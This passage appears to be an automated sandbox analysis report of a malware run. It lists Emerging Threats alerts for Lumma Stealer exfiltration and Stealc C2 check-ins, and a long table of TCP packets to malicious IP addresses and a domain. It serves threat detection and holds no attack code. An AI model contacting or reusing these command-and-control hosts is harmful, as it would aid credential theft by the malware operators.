                                                                                                                                                                                                                                                          2024-12-19T14:27:30.199818+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450273172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:30.199818+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450273172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:30.975216+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450273172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:32.327305+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450276172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:32.327305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450276172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:32.881923+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450275185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:33.269798+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450276172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:34.494021+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.450277172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:34.494021+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450277172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:35.288300+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450277172.67.179.109443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:36.751495+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450280185.215.113.1680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:27:47.904113+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450285185.215.113.20680TCP

                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:07.053333044 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.690512896 CET4973080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.854991913 CET8049730185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.855062962 CET4973080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:16.856272936 CET4973080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.165946007 CET8049730185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.171061039 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.171099901 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.171226025 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.174432039 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:17.174446106 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.554789066 CET8049730185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.555000067 CET4973080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.745137930 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.745239019 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.757078886 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.757118940 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.758091927 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:18.803359985 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:19.074512959 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:19.074512959 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:19.074727058 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:19.246344090 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:19.246397018 CET44349672173.222.162.32192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.069716930 CET4973080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.070118904 CET4973280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.143486977 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.143596888 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.143688917 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.145368099 CET49731443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.145382881 CET44349731104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.177645922 CET49733443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.177697897 CET44349733104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.177817106 CET49733443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.178273916 CET49733443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.178292990 CET44349733104.21.64.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.310834885 CET8049730185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.310916901 CET4973080192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.312820911 CET8049732185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.312902927 CET4973280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.313106060 CET4973280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.560951948 CET49733443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:20.577055931 CET8049732185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:21.795205116 CET8049732185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:21.795391083 CET4973280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:21.851588964 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:22.000979900 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:22.001084089 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:22.001334906 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:22.184664011 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364655972 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364669085 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364679098 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364690065 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364701986 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364710093 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364720106 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364723921 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364731073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364743948 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364754915 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364783049 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.364794970 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.486767054 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.486839056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.487168074 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.487217903 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.491708040 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.491750956 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.522409916 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.522427082 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.522496939 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.522535086 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.538275957 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.538364887 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.545540094 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.545552969 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.545595884 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.545618057 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.556500912 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.556515932 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.556566954 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.556583881 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.568317890 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.568331957 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.568371058 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.568414927 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.585388899 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.585469007 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.586086035 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.586296082 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.587666988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.587681055 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.587702036 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.587713003 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.587750912 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.588296890 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.588351011 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.599734068 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.599746943 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.599785089 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.599824905 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.606605053 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.606672049 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.607217073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.607372046 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.612615108 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.612668991 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.613209009 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.613266945 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.623558998 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.623573065 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.623637915 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.647855997 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.647871017 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.647931099 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.714984894 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.715042114 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.715241909 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.715303898 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.726665974 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.726677895 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.726715088 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.743596077 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.743648052 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.746748924 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.746835947 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.747584105 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.747692108 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.837183952 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.900597095 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.900612116 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.900665045 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917052984 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917068958 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917145967 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917148113 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917160988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917160988 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917179108 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917187929 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917191982 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917203903 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917203903 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917217970 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917218924 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917232037 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917234898 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917243004 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917252064 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917272091 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917283058 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917284012 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917315960 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917340040 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917359114 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917371988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917421103 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917422056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917449951 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917462111 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917534113 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917645931 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917669058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917681932 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917699099 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917715073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917726040 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917730093 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917735100 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917746067 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917746067 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917761087 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917772055 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917781115 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917784929 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917797089 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917799950 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917814016 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917819023 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917825937 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917836905 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917845011 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917848110 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917860985 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917875051 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917890072 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.917916059 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918077946 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918272972 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918284893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918317080 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918337107 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918344021 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918355942 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.918386936 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.921757936 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.921813965 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.926028013 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.926094055 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.960541010 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.960598946 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.961100101 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:23.961148024 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.000261068 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.000333071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.001394987 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.001467943 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.005816936 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.005882978 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.010607958 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.010654926 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.045542955 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.045634985 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.045900106 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.051631927 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.051645994 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.051657915 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.051685095 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.051707983 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.052500963 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.052556992 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.057681084 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.057694912 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.057737112 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.058541059 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.058598042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.058603048 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.058646917 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.058659077 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.058702946 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.059427023 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.059473991 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.059489965 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.059501886 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.059534073 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.060342073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.060355902 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.060389042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.060400963 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.060432911 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061152935 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061165094 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061177015 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061206102 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061244011 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061686039 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061701059 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.061737061 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:24.062973022 CET804973531.41.244.11192.168.2.4
